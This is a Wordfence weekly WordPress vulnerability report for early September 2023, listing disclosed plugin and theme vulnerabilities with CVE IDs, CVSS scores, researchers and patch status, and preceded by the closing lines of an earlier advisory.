If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.

For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

The post Two PHP Object Injection Vulnerabilities Fixed in Essential Blocks appeared first on Wordfence.

Wordfence Intelligence Weekly WordPress Vulnerability Report (September 4, 2023 to September 10, 2023)

Last week, there were 107 vulnerabilities disclosed in 89 WordPress Plugins and 5 WordPress themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 36 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected.

Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data to make the internet more secure. That is why the Wordfence Intelligence user interface, vulnerability API and webhook notifications are completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report.

Click here to sign-up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.


New Firewall Rules Deployed Last Week

The Wordfence Threat Intelligence Team reviews each vulnerability to determine impact and severity, along with assessing the likelihood of exploitation, to verify that the Wordfence Firewall provides sufficient protection.

The team rolled out enhanced protection via firewall rules for the following vulnerabilities in real-time to our Premium, Care, and Response customers last week:

Wordfence Premium, Care, and Response customers received this protection immediately, while users still running the free version of Wordfence will receive this enhanced protection after a 30 day delay.


Total Unpatched & Patched Vulnerabilities Last Week

Patch Status Number of Vulnerabilities
Unpatched 44
Patched 63

Total Vulnerabilities by CVSS Severity Last Week

Severity Rating Number of Vulnerabilities
Low Severity 2
Medium Severity 89
High Severity 11
Critical Severity 5

Total Vulnerabilities by CWE Type Last Week

Vulnerability Type by CWE Number of Vulnerabilities
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) 35
Cross-Site Request Forgery (CSRF) 31
Missing Authorization 24
Unrestricted Upload of File with Dangerous Type 3
Authorization Bypass Through User-Controlled Key 2
Deserialization of Untrusted Data 2
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) 2
External Control of File Name or Path 1
Improper Input Validation 1
Server-Side Request Forgery (SSRF) 1
Improper Privilege Management 1
Improper Neutralization of Formula Elements in a CSV File 1
Improper Encoding or Escaping of Output 1
Information Exposure 1
Improper Authorization 1

Researchers That Contributed to WordPress Security Last Week

Researcher Name Number of Vulnerabilities
Rio Darmawan 11
Mika 10
Abdi Pranata 10
Rafshanzani Suhada 7
thiennv 5
yuyudhn 4
Rafie Muhammad 4
LEE SE HYOUNG 3
Le Ngoc Anh 3
NGÔ THIÊN AN 3
Nguyen Xuan Chien 3
Marco Wotschka
(Wordfence Vulnerability Researcher)
2
Revan Arifio 2
Lana Codes
(Wordfence Vulnerability Researcher)
2
Skalucy 2
Elliot 2
FearZzZz 2
qilin_99 2
Pepitoh 1
Shuning Xu 1
deokhunKim 1
DoYeon Park 1
spacecroupier 1
Nguyen Anh Tien 1
Debangshu Kundu 1
Arpeet Rathi 1
Ravi Dharmawan 1
Theodoros Malachias 1
Alexander Concha 1
Pedro José Navas Pérez 1
Alex Sanford 1
emad 1
Emili Castells 1
Pavitra Tiwari 1
Alex Concha 1
László Radnai 1

 

Are you a security researcher who would like to be featured in our weekly vulnerability report? You can responsibly disclose your WordPress vulnerability discoveries to us and obtain a CVE ID through this form. Responsibly disclosing your vulnerability discoveries to us will also get your name added on the Wordfence Intelligence leaderboard along with being mentioned in our weekly vulnerability report.


WordPress Plugins with Reported Vulnerabilities Last Week

Software Name Software Slug
AcyMailing – Newsletter & mailing automation for WordPress acymailing
All in One B2B for WooCommerce all-in-one-b2b-for-woocommerce
Analytify – Google Analytics Dashboard For WordPress (GA4 made easy) wp-analytify
Auto Amazon Links – Amazon Associates Affiliate Plugin amazon-auto-links
Automatic YouTube Gallery automatic-youtube-gallery
Back To The Top Button back-to-the-top-button
BackupBliss – Backup Migration Staging backup-backup
BitPay Checkout for WooCommerce bitpay-checkout-for-woocommerce
Bulk NoIndex & NoFollow Toolkit bulk-noindex-nofollow-toolkit-by-mad-fish
CP Blocks cp-blocks
Carousel Slider carousel-slider
Click To Tweet click-to-tweet
Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms fluentform
Cookie Notice & Consent cookie-notice-consent
Customizable WordPress Gallery Plugin – Modula Image Gallery modula-best-grid-gallery
Directorist – WordPress Business Directory Plugin with Classified Ads Listings directorist
Duplicate Post Page Menu & Custom Post Type duplicate-post-page-menu-custom-post-type
EWWW Image Optimizer ewww-image-optimizer
Easy Form by AYS easy-form
Easy WP Cleaner easy-wp-cleaner
Email posts to subscribers email-posts-to-subscribers
EmbedPress – Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor embedpress
Export Import Menus export-import-menus
Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder form-maker
Goods Catalog goods-catalog
Hide admin notices – Admin Notification Center wp-admin-notification-center
Insert Estimated Reading Time insert-estimated-reading-time
Laposta Signup Basic laposta-signup-basic
Laposta Signup Embed laposta-signup-embed
Leadster leadster-marketing-conversacional
Live News live-news-lite
Locations locations
MailMunch – Grow your Email List mailmunch
Media Library Assistant media-library-assistant
My Account Page Editor my-account-page-editor
MyCryptoCheckout – Bitcoin, Ethereum, and 100+ altcoins for WooCommerce mycryptocheckout
Notice Bar notice-bar
Order Delivery Date for WP e-Commerce order-delivery-date
Outbound Link Manager outbound-link-manager
POEditor poeditor
Paid Membership Plugin, Ecommerce, Registration Form, Login Form, User Profile & Restrict Content – ProfilePress wp-user-avatar
PeproDev CF7 Database pepro-cf7-database
Poll Maker – Best WordPress Poll Plugin poll-maker
Premium Starter Templates astra-pro-sites
RSVPMaker rsvpmaker
Realbig For WordPress realbig-media
Regpack regpack
Rescue Shortcodes rescue-shortcodes
Restrict – membership, site, content and user access restrictions for WordPress restricted-content
SAML Single Sign On – SSO Login Standard miniorange-saml-20-single-sign-on
SIS Handball sis-handball
SendPress Newsletters sendpress
Simple Download Counter simple-download-counter
Simple Membership simple-membership
Slider Pro sliderpro
Social Share, Social Login and Social Comments Plugin – Super Socializer super-socializer
Staff / Employee Business Directory for Active Directory ldap-ad-staff-employee-directory-search
StagTools stagtools
Starter Templates — Elementor, WordPress & Beaver Builder Templates astra-sites
Stock Quotes List stock-quotes-list
Sunshine Photo Cart sunshine-photo-cart
Swifty Bar, sticky bar by WPGens swifty-bar
TelSender – Сontact form 7, Events, Wpforms and wooccommerce to telegram bot telsender
Tilda Publishing tilda-publishing
Travel Map travelmap-blog
UniConsent CMP for GDPR CPRA GPP TCF uniconsent-cmp
Use Memcached use-memcached
User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds userfeedback-lite
User Submitted Posts – Enable Users to Submit Posts from the Front End user-submitted-posts
VS Contact Form very-simple-contact-form
WP Accessibility Helper (WAH) wp-accessibility-helper
WP Crowdfunding wp-crowdfunding
WP Custom Post Template wp-custom-post-template
WP Directory Kit wpdirectorykit
WP Gallery Metabox wp-gallery-metabox
WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts wedevs-project-manager
WP iCal Availability wp-ical-availability
WP-dTree wp-dtree-30
WRC Pricing Tables – WordPress Responsive CSS3 Pricing Tables wrc-pricing-tables
WiserNotify Social Proof & FOMO Notification, WooCommerce Sales Popup, Review Popups, Notification Bars & Urgency Widgets wiser-notify
WooCommerce PensoPay woo-pensopay
Woocommerce Support System wc-support-system
WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds another-wordpress-classifieds-plugin
WordPress File Sharing Plugin user-private-files
WordPress Social Login wordpress-social-login
iFolders – Ultimate Folder Manager for Media, Pages, Posts & etc ifolders
rtMedia for WordPress, BuddyPress and bbPress buddypress-media
wordpress publish post email notification publish-post-email-notification
wpCentral wp-central

WordPress Themes with Reported Vulnerabilities Last Week

Software Name Software Slug
Attorney attorney
Flatsome flatsome
Raise Mag raise-mag
Wishful Blog wishful-blog
Woodmart woodmart

Vulnerability Details

Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities.

Media Library Assistant <= 3.09 – Unauthenticated Local/Remote File Inclusion & Remote Code Execution

Affected Software: Media Library Assistant
CVE ID: CVE-2023-4634
CVSS Score: 9.8 (Critical)
Researcher/s: Pepitoh
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/05c68377-feb6-442d-a3a0-1fbc246c7cbf

RSVPMaker <= 10.6.6 – Unauthenticated PHP Object Injection

Affected Software: RSVPMaker
CVE ID: CVE-2023-25054
CVSS Score: 9.8 (Critical)
Researcher/s: Ravi Dharmawan
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/647cc71d-4d3a-4722-b498-baaee2450809

All in One B2B for WooCommerce <= 1.0.3 – Unauthenticated Privilege Escalation

Affected Software: All in One B2B for WooCommerce
CVE ID: CVE-2023-4703
CVSS Score: 9.8 (Critical)
Researcher/s: Alexander Concha
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/aab3016d-5834-4b4a-a206-0b626884b335

Flatsome <= 3.17.5 – Unauthenticated PHP Object Injection

Affected Software: Flatsome
CVE ID: CVE-2023-40555
CVSS Score: 9.8 (Critical)
Researcher/s: Rafie Muhammad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bfc4863a-1b8c-4b13-9df1-18f221b40b26

Form Maker by 10Web <= 1.15.19 – Unauthenticated Arbitrary File Upload

Affected Software: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder
CVE ID: CVE Unknown
CVSS Score: 9.8 (Critical)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c691d129-35db-4de8-a28e-5e77347e2280

WP Project Manager <= 2.6.0 – Authenticated (Subscriber+) SQL Injection


Export Import Menus <= 1.8.0 – Authenticated (Contributor+) Arbitrary File Upload

Affected Software: Export Import Menus
CVE ID: CVE-2023-34385
CVSS Score: 8.8 (High)
Researcher/s: Emili Castells
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d74efb03-4a1c-4163-bd79-ef17975a609e

My Account Page Editor <= 1.3.1 – Authenticated (Subscriber+) Arbitrary File Upload

Affected Software: My Account Page Editor
CVE ID: CVE-2023-4536
CVSS Score: 8.8 (High)
Researcher/s: Alex Concha
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f87b6987-8896-4edf-9b14-8582426adeb0

ProfilePress <= 4.13.2 – Limited Privilege Escalation via ‘acceptable_defined_roles’


Woocommerce Support System <= 1.2.0 – Missing Authorization

Affected Software: Woocommerce Support System
CVE ID: CVE-2023-41686
CVSS Score: 7.3 (High)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/8004a306-4c8f-40e9-accc-a12d65b5f2f9

Woocommerce Support System <= 1.2.0 – Authenticated (Administrator+) SQL Injection via ‘orderby’

Affected Software: Woocommerce Support System
CVE ID: CVE-2023-41685
CVSS Score: 7.2 (High)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/efab7ec7-7143-4556-8d68-4a7e34f46e9e

Travel Map <= 1.0.1 – Unauthenticated Cross-Site Scripting

Affected Software: Travel Map
CVE ID: CVE-2023-41860
CVSS Score: 7.2 (High)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/3f04a742-56be-42e9-9080-2131c6e98325

Click To Tweet <= 2.0.14 – Unauthenticated Cross-Site Scripting

Affected Software: Click To Tweet
CVE ID: CVE-2023-41856
CVSS Score: 7.2 (High)
Researcher/s: thiennv
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b5031140-9a48-43da-b946-00ce9c70258b

PeproDev CF7 Database <= 1.7.0 – Unauthenticated Stored Cross-Site Scripting via form submission

Affected Software: PeproDev CF7 Database
CVE ID: CVE-2023-41863
CVSS Score: 7.2 (High)
Researcher/s: FearZzZz
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c7a7df90-a542-48cf-a58e-bcbddc978df2

Simple Membership <= 4.3.5 – Reflected Cross-Site Scripting

Affected Software: Simple Membership
CVE ID: CVE-2023-4719
CVSS Score: 7.2 (High)
Researcher/s: FearZzZz
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e4b10172-7e54-4ff8-9fbb-41d160ce49e4

User Feedback <= 1.0.7 – Unauthenticated Stored Cross-Site Scripting

Affected Software: User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds
CVE ID: CVE-2023-39308
CVSS Score: 7.2 (High)
Researcher/s: Revan Arifio
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f9e45bc2-6db6-49cd-8a4a-58489a8ddac2

All in One B2B for WooCommerce <= 1.0.3 – Cross-Site Request Forgery

Affected Software: All in One B2B for WooCommerce
CVE ID: CVE-2023-3547
CVSS Score: 6.5 (Medium)
Researcher/s: Alex Sanford
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/bd53bc57-b10e-47a7-8c10-96bf1f1e82a5

Auto Amazon Links <= 5.3.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via style

Affected Software: Auto Amazon Links – Amazon Associates Affiliate Plugin
CVE ID: CVE-2023-4482
CVSS Score: 6.4 (Medium)
Researcher/s: Marco Wotschka
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/11ffb8a1-55d2-44c5-bcd2-ba866b94e8bc

Goods Catalog <= 2.4.1 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Goods Catalog
CVE ID: CVE-2023-41687
CVSS Score: 6.4 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/21542a9e-efa2-4655-b076-d282e3678fdf

Rescue Shortcodes <= 2.5 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Rescue Shortcodes
CVE ID: CVE-2023-41728
CVSS Score: 6.4 (Medium)
Researcher/s: yuyudhn
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6a11e7c9-f565-4a8c-895f-425c6654b5a9

Starter Templates <= 3.2.4 – Authenticated (Contributor+) Server-Side Request Forgery

Affected Software/s: Starter Templates — Elementor, WordPress & Beaver Builder Templates, Premium Starter Templates
CVE ID: CVE-2023-41804
CVSS Score: 6.4 (Medium)
Researcher/s: Rafie Muhammad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6e0bdbba-2b67-42b9-8c26-115d472aed0e

Simple Download Counter <= 1.6 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Simple Download Counter
CVE ID: CVE-2023-4838
CVSS Score: 6.4 (Medium)
Researcher/s: NGÔ THIÊN AN
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/aa5f7f2a-c7b7-4339-a608-51fd684c18bf

User Submitted Posts <= 20230901 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: User Submitted Posts – Enable Users to Submit Posts from the Front End
CVE ID: CVE-2023-41696
CVSS Score: 6.4 (Medium)
Researcher/s: NGÔ THIÊN AN
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b7fca965-86f8-4ee4-a9d6-cb18fe5f098e

WordPress Social Login <= 3.0.4 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: WordPress Social Login
CVE ID: CVE-2023-4773
CVSS Score: 6.4 (Medium)
Researcher/s: Lana Codes
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b987822d-2b1b-4f79-988b-4bd731864b63

User Submitted Posts – Enable Users to Submit Posts from the Front End <= 20230811 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Affected Software: User Submitted Posts – Enable Users to Submit Posts from the Front End
CVE ID: CVE-2023-4779
CVSS Score: 6.4 (Medium)
Researcher/s: NGÔ THIÊN AN
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d21ca709-183f-4dd1-849c-f1b2a4f7ec43

Notice Bar <= 3.1.0 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Notice Bar
CVE ID: CVE-2023-41847
CVSS Score: 6.4 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/defc5b5a-243d-4564-a9f8-3ecf3538129b

Locations <= 4.0 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Locations
CVE ID: CVE-2023-41797
CVSS Score: 6.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/fe10acf6-2649-4e85-abd1-b6840169eb41

Attorney <= 3 – Reflected Cross-Site Scripting

Affected Software: Attorney
CVE ID: CVE-2023-41692
CVSS Score: 6.1 (Medium)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/026443b6-4ab5-4f31-8a8d-2019097bde4c

Restrict <= 2.2.4 – Reflected Cross-Site Scripting

Affected Software: Restrict – membership, site, content and user access restrictions for WordPress
CVE ID: CVE-2023-41861
CVSS Score: 6.1 (Medium)
Researcher/s: thiennv
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/62029ce5-ab97-4594-93e6-469ef5692320

WooCommerce PensoPay <= 6.3.1 – Reflected Cross-Site Scripting via ‘pensopay_action’

Affected Software: WooCommerce PensoPay
CVE ID: CVE-2023-41691
CVSS Score: 6.1 (Medium)
Researcher/s: Le Ngoc Anh
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6845b506-3d38-47f6-9348-d7931e65707a

WoodMart <= 7.2.4 – Reflected Cross-Site Scripting

Affected Software: Woodmart
CVE ID: CVE-2023-41872
CVSS Score: 6.1 (Medium)
Researcher/s: Rafie Muhammad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/6fc92b8f-6794-461a-b6b6-598de21f5e2d

AcyMailing SMTP Newsletter <= 8.6.2 – Reflected Cross-Site Scripting

Affected Software: AcyMailing – Newsletter & mailing automation for WordPress
CVE ID: CVE-2023-41867
CVSS Score: 6.1 (Medium)
Researcher/s: Rafshanzani Suhada
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/9f82ec7c-72a0-4c3b-8041-c6ad080a48f1

Stagtools <= 2.3.7 – Reflected Cross-Site Scripting

Affected Software: StagTools
CVE ID: CVE-2023-41868
CVSS Score: 6.1 (Medium)
Researcher/s: Le Ngoc Anh
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ca09ce0d-3989-420d-9457-f0acd709cc6b

Poll Maker <= 4.7.0 – Reflected Cross-Site Scripting

Affected Software: Poll Maker – Best WordPress Poll Plugin
CVE ID: CVE-2023-41871
CVSS Score: 6.1 (Medium)
Researcher/s: Le Ngoc Anh
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/faad9cf7-5d83-4ade-b121-c38fb0de78a5

Wishful Blog <= 2.0.1 & Raise Mag <= 1.0.7 – Unauthenticated Cross-Site Scripting

Affected Software/s: Raise Mag, Wishful Blog
CVE ID: CVE-2023-28621
CVSS Score: 6.1 (Medium)
Researcher/s: László Radnai
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/fb33f779-d045-48dd-babe-8b1fab903124

Stock Quotes List <= 2.9.9 – Authenticated (Contributor+) Stored Cross-Site Scripting

Affected Software: Stock Quotes List
CVE ID: CVE-2023-41666
CVSS Score: 5.4 (Medium)
Researcher/s: deokhunKim
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/1dffbb2d-69d1-495c-8c96-64c5fd878fcd

Tilda Publishing <= 0.3.21 – Missing Authorization

Affected Software: Tilda Publishing
CVE ID: CVE-2023-31234
CVSS Score: 5.4 (Medium)
Researcher/s: spacecroupier
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/4a992bb2-67b9-48db-a536-c3af79e93af4

Staff / Employee Business Directory for Active Directory <= 1.2.1 – Insufficient Escaping of Stored LDAP Values

Affected Software: Staff / Employee Business Directory for Active Directory
CVE ID: CVE-2023-4757
CVSS Score: 5.4 (Medium)
Researcher/s: Pedro José Navas Pérez
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/b1355e9f-fa3a-439a-a13f-49b10dd4473a

Easy WP Cleaner <= 1.9 – Cross-Site Request Forgery

Affected Software: Easy WP Cleaner
CVE ID: CVE-2023-41697
CVSS Score: 5.4 (Medium)
Researcher/s: Mika
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/c4c2689d-be51-4907-b624-c85da39f545d

Contact Form for Plugin by Fluent Forms <= 5.0.8 – Insecure Direct Object Reference

Affected Software: Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms
CVE ID: CVE-2023-41952
CVSS Score: 5.3 (Medium)
Researcher/s: Revan Arifio
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/20f31e48-0dbb-498a-a400-681cacea7c9c

Sunshine Photo Cart <= 3.0.5 – Insecure Direct Object Reference to Order Manipulation

Affected Software: Sunshine Photo Cart
CVE ID: CVE-2023-41796
CVSS Score: 5.3 (Medium)
Researcher/s: yuyudhn
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/2eae7c33-2347-4b34-8b5f-7f4a6ee3e9c1

TelSender <= 1.14.7 – Missing Authorization

Affected Software: TelSender – Сontact form 7, Events, Wpforms and wooccommerce to telegram bot
CVE ID: CVE-2023-41683
CVSS Score: 5.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/39193ebd-005a-4497-9939-99947323a1a0

WP Directory Kit <= 1.2.6 – Missing Authorization

Affected Software: WP Directory Kit
CVE ID: CVE-2023-41875
CVSS Score: 5.3 (Medium)
Researcher/s: Debangshu Kundu, Arpeet Rathi
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/60083262-198d-4a7d-bb0a-717a744e20f9

Email posts to subscribers <= 6.2 – Missing Authorization to Sensitive Information Exposure

Affected Software: Email posts to subscribers
CVE ID: CVE-2023-41735
CVSS Score: 5.3 (Medium)
Researcher/s: Rafshanzani Suhada
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/7730d670-d270-4755-bc9a-550498a28edb

WRC Pricing Tables <= 2.3.7 – Missing Authorization

Affected Software: WRC Pricing Tables – WordPress Responsive CSS3 Pricing Tables
CVE ID: CVE-2023-32293
CVSS Score: 5.3 (Medium)
Researcher/s: Abdi Pranata
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/823dc422-12f4-4f7d-a305-2e4db18bafdf

WiserNotify Social Proof <= 2.5 – Missing Authorization


EWWW Image Optimizer <= 7.2.0 – Sensitive Information Exposure

Affected Software: EWWW Image Optimizer
CVE ID: CVE Unknown
CVSS Score: 5.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d7d08bfd-9861-4e21-a696-25b00233ad94

VS Contact Form <= 13.9 – Missing Authorization

Affected Software: VS Contact Form
CVE ID: CVE-2023-41862
CVSS Score: 5.3 (Medium)
Researcher/s: qilin_99
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e3f665b8-fbd5-4100-baf6-3fa99332a5dc

BitPay Checkout for WooCommerce <= 4.1.0 – Missing Authorization

Affected Software: BitPay Checkout for WooCommerce
CVE ID: CVE-2023-41803
CVSS Score: 5.3 (Medium)
Researcher/s: Mika
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ea489c69-d4d9-4e05-8cac-25fd17d48506

UniConsent Cookie Consent CMP for GDPR / CCPA <= 1.4.2 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: UniConsent CMP for GDPR CPRA GPP TCF
CVE ID: CVE-2023-41800
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/19c9cf3e-553b-4cbd-9f2c-803e188a2581

WordPress File Sharing Plugin <= 2.0.3 – Authenticated (Admin+) Stored Cross-Site Scripting

Affected Software: WordPress File Sharing Plugin
CVE ID: CVE-2023-4636
CVSS Score: 4.4 (Medium)
Researcher/s: Shuning Xu
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/1df04293-87e9-4ab4-975d-54d36a993ab0

Insert Estimated Reading Time <= 1.2 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Insert Estimated Reading Time
CVE ID: CVE-2023-41734
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/45426cdd-2721-4959-8f0b-13025f775d62

Cookie Notice & Consent 1.6.0 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Cookie Notice & Consent
CVE ID: CVE-2023-41948
CVSS Score: 4.4 (Medium)
Researcher/s: DoYeon Park
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/489dc156-b8cb-4e08-a847-73a891398d5c

SendPress Newsletters <= 1.22.3.31 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: SendPress Newsletters
CVE ID: CVE-2023-41729
CVSS Score: 4.4 (Medium)
Researcher/s: yuyudhn
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/5d173077-06c4-4a23-a664-0be8516053ec

Swifty Bar, sticky bar by WPGens <= 1.2.10 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Swifty Bar, sticky bar by WPGens
CVE ID: CVE-2023-41737
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/66c90387-af23-48fc-94da-708b9c223fe3

wordpress publish post email notification <= 1.0.2.2 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: wordpress publish post email notification
CVE ID: CVE-2023-41731
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/705d11b1-0924-46ae-a6e6-8fab16a4df00

iFolders <= 1.5.0 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: iFolders – Ultimate Folder Manager for Media, Pages, Posts & etc
CVE ID: CVE-2023-41949
CVSS Score: 4.4 (Medium)
Researcher/s: emad
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d1f957ce-7bb0-4701-8b2a-522211c408d8

Order Delivery Date for WP e-Commerce <= 1.2 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Order Delivery Date for WP e-Commerce
CVE ID: CVE-2023-41859
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/d74f5813-cf7a-4ffb-9306-56f29b3a7d04

Email posts to subscribers <= 6.2 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Email posts to subscribers
CVE ID: CVE-2023-41736
CVSS Score: 4.4 (Medium)
Researcher/s: Rafshanzani Suhada
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/e818a5db-acb7-4b16-80b1-939904e93791

Back To The Top Button <= 2.1.5 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Back To The Top Button
CVE ID: CVE-2023-41733
CVSS Score: 4.4 (Medium)
Researcher/s: Rio Darmawan
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/ed8cd92a-c791-4781-a7bc-9b2a4d559d7d

Regpack <= 0.1 – Authenticated (Administrator+) Stored Cross-Site Scripting

Affected Software: Regpack
CVE ID: CVE-2023-41855
CVSS Score: 4.4 (Medium)
Researcher/s: Pavitra Tiwari
Patch Status: Unpatched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/f3cdc0ba-d28f-488c-a703-f9d880f0582e

Backup Migration <= 1.2.9 – Cross-Site Request Forgery

Affected Software: BackupBliss – Backup Migration Staging
CVE ID: CVE Unknown
CVSS Score: 4.3 (Medium)
Researcher/s: Unknown
Patch Status: Patched
Vulnerability Details: https://wordfence.com/threat-intel/vulnerabilities/id/00274313-9079-4877-b72e-310e312aa814

Automatic YouTube Gallery <= 2.3.3 – Missing Authorization via AJAX actions

Affected Software: Automatic YouTube Gallery
CVE ID: CVE-2023-41866
